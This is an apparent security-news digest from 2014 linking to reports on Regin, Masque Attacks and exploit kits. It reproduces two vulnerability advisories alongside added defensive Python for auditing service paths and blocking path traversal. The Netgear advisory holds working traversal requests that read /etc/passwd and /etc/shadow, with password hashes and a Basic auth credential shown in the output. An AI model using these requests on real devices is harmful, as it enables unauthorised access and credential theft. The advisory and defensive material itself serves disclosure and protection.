Channel: BOT24
Viewing all 8064 articles

The Other Side of Masque Attacks: Data Encryption Not Found in iOS Apps

Based on our research into the iOS threat Masque Attacks announced last week, Trend Micro researchers have found a new way that malicious apps installed through successful Masque Attacks can pose a threat to iOS devices: by accessing unencrypted data used by legitimate apps.

more here..........http://blog.trendmicro.com/trendlabs-security-intelligence/the-other-side-of-masque-attacks-data-encryption-not-found-in-ios-apps/

PUPs and Java Removal Tools, Oh My

When it comes to online threats, these days website ads could be considered a grey area. For the majority of site owners providing free services or content, they’re good to have because they generate revenue from visits and clicks. For normal site visitors, they (we) have learned to gloss over the ads at best. Regardless of where you stand on ads, they’re everywhere, and they may be here to stay for a long time.

What most internet users may not realize is that ads can be used as doors leading to user systems, thanks to how online criminals have exploited them for their malicious purposes.

more here........https://blog.malwarebytes.org/malvertising-2/2014/11/pups-and-java-removal-tools-oh-my/

IE11 ImmutableApplicationSettings EPM Privilege Escalation

IE11 exposes a shared memory section to all tab process which contains configuration settings, named Immutable Application Settings. This contains settings such as whether protected mode is currently enabled.

The vulnerability is due to a permissive DACL on the section object

more here............https://code.google.com/p/google-security-research/issues/detail?id=95

DoubleDirect – Zimperium Discovers Full-Duplex ICMP Redirect Attacks in the Wild

Zimperium Mobile Security Labs have investigated during the last year a new type of attack technique in the wild being exploited by attackers. Aptly named “DoubleDirect,” this attack technique is a type of “Man-in-the-Middle” attack (MITM) enabling an attacker to redirect a victim’s traffic to the attacker’s device. Once redirected, the attacker can steal credentials and deliver malicious payloads to the victim’s mobile device that can not only quickly infect the device, but also spread throughout a corporate network.

more here........http://blog.zimperium.com/doubledirect-zimperium-discovers-full-duplex-icmp-redirect-attacks-in-the-wild/

PayPal takes 18 months to patch critical remote code execution hole

Paypal has closed a remote code execution vulnerability in its service some 18 months after it was reported.

more here........http://www.theregister.co.uk/2014/11/21/paypal_vuln/?mt=1416565446664

CVE-2014-6332 (Internet Explorer) and Exploits Kits

For this CVE refer to:
http://technet.microsoft.com/security/bulletin/MS14-064

The first encounter I had with this CVE in exploit kit, was in the Sweet Orange from the actor pushing DarkShell via KR compromised website.

more here.........http://malware.dontneedcoffee.com/2014/11/cve-2014-6332.html

Santa

A binary whitelisting/blacklisting system for Mac OS X

more here..........https://github.com/google/santa

Attack Vector Linux

For anonymized penetration testing & security auditing. 2 distributions combined

more here........http://turing.slu.edu/~hastint/AttackVector.htm

Detekt

Detekt is a free tool that scans your Windows computer for traces of FinFisher and Hacking Team RCS, commercial surveillance spyware that has been identified as also being used to target and monitor human rights defenders and journalists around the world.

more here.........https://resistsurveillance.org/

Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation

Privacyware Privatefirewall 7.0 Unquoted Service Path Privilege Escalation


Vendor: PWI, Inc.
Product web page: http://www.privacyware.com
Affected version: 7.0.30.3


Summary: Privatefirewall multi-layered endpoint security software protects
32 and 64 bit Windows desktops and servers from malware and unauthorized use.
Personal firewall, packet inspection, URL filtering, anti-logger, process
monitor, and application/system behavior modeling and anomaly detection
components stop hackers, spyware, viruses and other forms of malware before
they can cause damage.

Desc: Privatefirewall suffers from an unquoted search path issue impacting
the Core Service 'PFNet' service for Windows deployed as part of Privatefirewall
bundle. This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system. A
successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local user’s code would execute with the elevated privileges
of the application.

Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Microsoft Windows 7 Ultimate SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2014-5209
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5209.php


09.11.2014

---


C:\Users\user>sc qc PFNet
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: PFNet
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe
        LOAD_ORDER_GROUP   : TDI
        TAG                : 0
        DISPLAY_NAME       : Privacyware network service
        DEPENDENCIES       : RpcSs
        SERVICE_START_NAME : LocalSystem


--

C:\Users\user>icacls "C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe"
C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                                 BUILTIN\Administrators:(I)(F)
                                                                 BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files


--
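The `sc qc` and `icacls` output above is what a reviewer looks at by hand: an image path that is not wrapped in quotes, contains spaces, and runs as LocalSystem. The following Python is an added example, not part of the Zero Science advisory or the vendor's software; it parses `sc qc` output of the shape quoted above, flags the unquoted-with-spaces condition, and lists the parent directories whose write ACLs an administrator should verify (the same check `icacls` was used for above). The sample text is the advisory's own `sc qc PFNet` dump, embedded as a constructed string; the `svchost.exe` and quoted-path cases in the usage note are made up for contrast.

```python
import re

# Constructed sample input: the `sc qc PFNet` output quoted in the advisory,
# with the "[SC]" status line included so the parser has to skip it.
SAMPLE_SC_QC = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: PFNet
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe
        LOAD_ORDER_GROUP   : TDI
        TAG                : 0
        DISPLAY_NAME       : Privacyware network service
        DEPENDENCIES       : RpcSs
        SERVICE_START_NAME : LocalSystem
"""

# One "FIELD_NAME : value" line of sc qc output; the "[SC] ..." line and
# blank lines do not match.
FIELD_RE = re.compile(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$")


def parse_sc_qc(text):
    """Turn `sc qc` output into a dict of FIELD -> value."""
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def executable_part(binary_path):
    """Return BINARY_PATH_NAME up to and including the first '.exe',
    dropping any service arguments that follow (e.g. '-k netsvcs')."""
    m = re.search(r"\.exe", binary_path, re.IGNORECASE)
    return binary_path[: m.end()] if m else binary_path.split(" ")[0]


def is_unquoted_with_spaces(binary_path):
    """True when the image path is not quoted and the executable path
    itself contains a space, so the path lookup at service start is
    ambiguous. A quoted path is fine regardless of its contents."""
    if binary_path.startswith('"'):
        return False
    return " " in executable_part(binary_path)


def audit_directories(binary_path):
    """Parent directories of every space-delimited prefix of the executable
    path, in lookup order: these are the locations whose write ACL an
    administrator must verify for an unquoted path."""
    exe = executable_part(binary_path)
    dirs = []
    for i, ch in enumerate(exe):
        if ch != " ":
            continue
        parent = exe[:i].rsplit("\\", 1)[0]
        if parent.endswith(":"):        # "C:" means the drive root
            parent += "\\"
        if parent not in dirs:
            dirs.append(parent)
    return dirs


def audit_service(sc_qc_text):
    """Summarise one `sc qc` dump: the finding plus the locations to check."""
    svc = parse_sc_qc(sc_qc_text)
    path = svc.get("BINARY_PATH_NAME", "")
    finding = is_unquoted_with_spaces(path)
    return {
        "service": svc.get("SERVICE_NAME"),
        "runs_as": svc.get("SERVICE_START_NAME"),
        "binary_path": path,
        "unquoted_with_spaces": finding,
        "directories_to_audit": audit_directories(path) if finding else [],
    }


if __name__ == "__main__":
    for key, value in audit_service(SAMPLE_SC_QC).items():
        print(f"{key}: {value}")
```

For the advisory's dump, `audit_service` reports the service as unquoted-with-spaces, running as LocalSystem, with `C:\` and `C:\Program Files (x86)\Privacyware` as the directories to check; by default only Administrators and TrustedInstaller can write there, which is why the advisory notes the attacker must first get a file into the system root path. A quoted path such as `"C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe"` or an argument-bearing but space-free one such as `C:\Windows\system32\svchost.exe -k netsvcs` (both constructed) is not flagged.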

Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit

Netgear Wireless Router WNR500 Parameter Traversal Arbitrary File Access Exploit


Vendor: NETGEAR
Product web page: http://www.netgear.com
Affected version: WNR500 (firmware: 1.0.7.2)

Summary: The NETGEAR compact N150 classic wireless router (WNR500) improves
your legacy Wireless-G network. It is a simple, secure way to share your
Internet connection and allows you to easily surf the Internet, use email,
and have online chats. The quick, CD-less setup can be done through a web
browser. The small, efficient design fits perfectly into your home.

Desc: The router suffers from an authenticated file inclusion vulnerability
(LFI) because input passed through the 'getpage' parameter to the 'webproc'
script is not properly verified before being used to include files. This can
be exploited to include files from local resources with directory traversal
attacks.

Tested on: mini_httpd/1.19 19dec2003


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2014-5208
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5208.php


16.11.2014

--


= 1 =============================================================

GET /cgi-bin/webproc?getpage=../../../etc/passwd&var:menu=advanced&var:page=null HTTP/1.1
Host: 192.168.1.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=7dc3268b; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; sessionid=7dc3268b; auth=ok; expires=Mon, 31-Jan-2050 16:00:00 GMT; language=en_us
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Connection: keep-alive

---

HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache
set-cookie: sessionid=7dc3268b;
set-cookie: auth=ok;
set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;

#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh


= 2 =============================================================

GET /cgi-bin/webproc?getpage=../../../etc/shadow&var:menu=advanced&var:page=null HTTP/1.1
Host: 192.168.1.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=7dc3268b; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; sessionid=7dc3268b; auth=ok; expires=Mon, 31-Jan-2050 16:00:00 GMT; language=en_us
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Connection: keep-alive

---

HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache
set-cookie: sessionid=7dc3268b;
set-cookie: auth=ok;
set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;

#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
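The two exchanges above show the root cause: `getpage` is joined onto the document root and the `../` segments are honoured, so the CGI serves any file the web server process can read. The following Python is an added example, not code from the router's firmware, the advisory, or mini_httpd; it places the flawed resolution pattern beside a hardened resolver and adds a small log-side check that flags request lines like the ones above. The document root `/www` and the `.html`/`.htm` template suffixes are assumptions for illustration; the request line it runs is the advisory's own.

```python
import posixpath
from urllib.parse import parse_qs, urlsplit

# Assumptions (not from the advisory): page templates live under this
# document root and are all .html/.htm files. Both values are hypothetical.
WEB_ROOT = "/www"
ALLOWED_SUFFIXES = (".html", ".htm")


def resolve_page_vulnerable(getpage, root=WEB_ROOT):
    """The flawed pattern: join the parameter to the root and normalise.
    Every '../' segment walks one level further out of the root."""
    return posixpath.normpath(posixpath.join(root, getpage))


def resolve_page_safe(getpage, root=WEB_ROOT):
    """Hardened resolver. Expects the value exactly as the query-string
    parser decoded it (decode once, never twice). Rejects NULs, backslashes
    and absolute paths, normalises, then requires the result to stay under
    root and to name an allowed template type. Raises ValueError otherwise."""
    if "\x00" in getpage or "\\" in getpage:
        raise ValueError("illegal character in getpage")
    if getpage.startswith("/"):
        raise ValueError("absolute path not allowed")
    candidate = posixpath.normpath(posixpath.join(root, getpage))
    # commonpath is the check that matters: a plain startswith(root) test
    # would also accept "/www-other/..." when root is "/www".
    if posixpath.commonpath([root, candidate]) != root:
        raise ValueError("path escapes document root")
    if not candidate.endswith(ALLOWED_SUFFIXES):
        raise ValueError("not a page template")
    return candidate


def page_allowed(getpage, root=WEB_ROOT):
    """Boolean wrapper around resolve_page_safe for filters and tests."""
    try:
        resolve_page_safe(getpage, root)
    except ValueError:
        return False
    return True


def getpage_is_traversal(request_line):
    """Detection helper for access logs: parse an HTTP request line and
    report whether any getpage value would be refused by the safe resolver.
    parse_qs performs the single percent-decoding the CGI layer would do."""
    try:
        _method, target, _version = request_line.split(" ", 2)
    except ValueError:
        return False
    query = parse_qs(urlsplit(target).query)
    return any(not page_allowed(value) for value in query.get("getpage", []))


if __name__ == "__main__":
    # The first request line quoted in the advisory.
    line = ("GET /cgi-bin/webproc?getpage=../../../etc/passwd"
            "&var:menu=advanced&var:page=null HTTP/1.1")
    print("vulnerable resolver ->", resolve_page_vulnerable("../../../etc/passwd"))
    print("safe resolver accepts it ->", page_allowed("../../../etc/passwd"))
    print("flag in access log ->", getpage_is_traversal(line))
```

The vulnerable resolver turns the advisory's `getpage=../../../etc/passwd` into `/etc/passwd`, which is exactly what the `HTTP/1.0 200 OK` responses above returned; the safe resolver refuses it, as well as an absolute path, an encoded `%2e%2e/` variant (decoded once by `parse_qs` before the check) and a `a/../../etc/passwd` form that normalises out of the root, while a legitimate `advanced/wlan.html` (a constructed page name) resolves to `/www/advanced/wlan.html`. Running `getpage_is_traversal` over the web server's request log is a cheap way to spot probing of this parameter on devices that cannot be patched.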

Hacking RFID Payment Cards Made Possible with Android App

We recently encountered a high-risk Android app detected as ANDROIDOS_STIP.A in Chile. This app, found distributed through forums and blogs, can be used to hack into the user’s RFID bus transit card to recharge the credits. What is the mechanism behind this, and what is the security risk of RFID payment cards in general?

more here..........http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-rfid-payment-cards-made-possible-with-android-app/

The Regin Espionage Toolkit

Regin is the latest in the line of sophisticated espionage toolkits used to target a range of organizations around the world. As already reported, it's one of the more complex pieces of malware around, and just like many of the other toolkits it also has a long history behind it. We first encountered Regin nearly six years ago in early 2009, when we found it hiding on a Windows server in a customer environment in Northern Europe.

more here..........https://www.f-secure.com/weblog/archives/00002766.html

linux-native-backdoors

Repository holding all alternatives of *nix backdoors.

more here.........https://github.com/ulissescastro/linux-native-backdoors

Regin: Top-tier espionage tool enables stealthy surveillance

An advanced spying tool, Regin displays a degree of technical competence rarely seen and has been used in spying operations against governments, infrastructure operators, businesses, researchers, and private individuals.

more here.........http://www.symantec.com/connect/blogs/regin-top-tier-espionage-tool-enables-stealthy-surveillance

Magnitude Exploit Kit Backend Infrastructure Insight - Part II

Welcome back to another edition of “exposing Magnitude exploit-kit internals”! As already mentioned in our previous posts (1st and 2nd), the back-end infrastructure of this highly prevalent Exploit Kit has been revealed to be pretty exciting from the security research point-of-view. With this post, we’ll expose additional features and cool tricks that Magnitude uses, reveal more information about its infrastructure and talk about its implementation in the wild.

more here........http://blog.spiderlabs.com/2014/11/magnitude-exploit-kit-backend-infrastructure-insight-part-ii.html

Sony Pictures hacked, entire computer system reportedly unusable

Reports that Sony Pictures has been hacked have been trickling in this morning, after a thread appeared on Reddit claiming all computers at the company were offline due to a hack.

more here........http://thenextweb.com/insider/2014/11/24/sony-pictures-hacked-employee-computers-offline/

Regin: Nation-state ownage of GSM networks

"Beware of Regin, the master! His heart is poisoned. He would be thy bane..."

more here.......http://securelist.com/blog/research/67741/regin-nation-state-ownage-of-gsm-networks/

Real HSM Breaches

Hardware Security Modules (HSMs) are tamper-resistant special-purpose computers that protect the most sensitive cryptographic key material in an organisation. They are used for security-critical applications such as electronic payment, PKI, inter-bank transfers, and PIN management in the cash machine network. At Cryptosense we produce software to audit the application programme interfaces (APIs) of these devices and find security flaws. A natural question is: do these systems really ever suffer breaches? Don’t attacks happen elsewhere?

In this article, we’ll look at two major breaches of critical applications secured by HSMs for which the details have become more or less public, the Dutch Certification Authority (CA) Diginotar, and the payment processor RBS Worldpay.

more here..........http://cryptosense.com/real-hsm-breaches/

Craigslist's Netsol account was compromised, name servers changed

The craigslist account at one of our registrars was compromised and the NS
records migrated away from their rightful home.  That issue has since been
corrected, but the various caches around the Internet are still holding the
old data.

more here........https://lists.dns-oarc.net/pipermail/dns-operations/2014-November/012479.html